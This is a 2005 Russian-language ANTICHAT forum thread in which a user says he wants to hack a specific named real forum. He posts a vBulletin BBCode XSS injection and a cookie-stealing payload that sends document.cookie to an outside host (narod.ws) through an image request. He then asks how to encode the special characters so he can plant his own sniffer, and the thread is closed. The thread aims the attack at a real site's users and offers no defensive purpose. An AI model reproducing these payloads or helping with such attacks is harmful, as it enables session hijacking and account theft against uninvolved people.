HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы с vBulletin
  #1  
Старый 18.12.2005, 03:49
KP0T
Новичок
Регистрация: 13.03.2005
Сообщений: 29
С нами: 11137793

Репутация: 0
По умолчанию Проблемы с vBulletin

Короче хочу ломануть вот этот форумчик _http://forum.polarnet.ru/

вот этот код
Код:
[HTML]http://www.wj.com]wj wj[/URL]
даёт нам что-то типа
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' target=_blank>wj 
<FONT onmouseover=alert(/Hello_from_WJ/) face='"Arial' size=+7 &quot;>wj</FONT>" 
target="_blank"&gt;http://www.wj.com]wj &lt;font face="Ar.../) 
/"&gt;wj&lt;/font&gt;</A></A>
Отсюда делаем вывод что xxs возможна, но как снифер поюзать?! вот в чём вопрос, потому что код типа
Нехрена нам не даёт, а именно в сорцах всё смотрится так
Код:
[HTML]<A href='http://www.wj.com<a href="http://www.wj.com' 
target=_blank>wj[FONT=Arial size=+7 
style=background:url(javascript<B></B>:document.images[1].src="http://narod.ws/xss/s.gif?"+document.cookie); 
/]wj [/FONT]" target="_blank"&gt;http://www.wj.com]wj[FONT=Arial...]wj 
[/FONT</A>
Вообщем ай нид хелп.
 

  #2  
Старый 18.12.2005, 04:09
KP0T
Новичок
Регистрация: 13.03.2005
Сообщений: 29
С нами: 11137793

Репутация: 0
По умолчанию

Усё нашёл эксплойт на форуме, вот этот здесь http://www.forum.antichat.ru/threadnav11693-1-10.html

Тока теперь раскажите как шифровать эти спец символы, хочу свой снифак воткнуть.
 

  #3  
Старый 18.12.2005, 04:25
Thesaurus
Banned
Регистрация: 03.12.2005
Сообщений: 22
С нами: 10755686

Репутация: 30
По умолчанию

 

  #4  
Старый 18.12.2005, 05:35
KP0T
Новичок
Регистрация: 13.03.2005
Сообщений: 29
С нами: 11137793

Репутация: 0
По умолчанию

Сенкс большой
 

  #5  
Старый 18.12.2005, 16:31
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

ПРоблема решена,тему закрываю
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
перловый брутфорс md5 DetMyl PHP 2 26.12.2005 15:52
vBulletin Version 3.0.7 Enter.beta Уязвимости CMS / форумов 9 11.11.2005 01:57
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.